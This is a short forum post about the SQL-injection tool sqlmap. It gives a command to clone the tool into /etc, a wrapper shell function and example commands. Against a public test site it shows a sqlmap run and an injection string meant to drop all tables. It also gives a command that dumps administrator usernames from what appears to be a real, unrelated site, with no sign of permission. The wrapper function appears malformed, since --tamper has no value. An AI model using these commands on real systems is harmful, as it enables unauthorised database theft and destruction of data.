PC & IT SUPPORT MADE EASY FORUM
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Sqlmap Super Fast Penetration Linux Function

Go down

Sqlmap Super Fast Penetration Linux Function Empty Sqlmap Super Fast Penetration Linux Function

Post by jamied_uk 11th May 2017, 00:26





How 2 update


Code:
cd /etc/

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap





New Example: (function)




Code:
function sql(){
sqlmap --wizard --time-sec 10 -u $1 --dbs --tamper
}




Example

Code:
sql http://testphp.vulnweb.com/listproducts.php?cat=1



How 2 use Sqlmap


Extra
Code:
testphp.vulnweb.com/listproducts.php?cat=-1' or 68 = '66; DROP ALL TABLES; --


Code:
sqlmap -u www.gba-corona.com/news.php?id=6 -D cif1 -T ADMINISTRATOR -C username --dump


More Info Foun @

kalitutorials.net/2014/03/hacking-website-with-sqlmap-in-kali.html

security.stackexchange.com/questions/33900/sql-injection-drop-all-tables
jamied_uk
jamied_uk
Admin

Posts : 2942
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum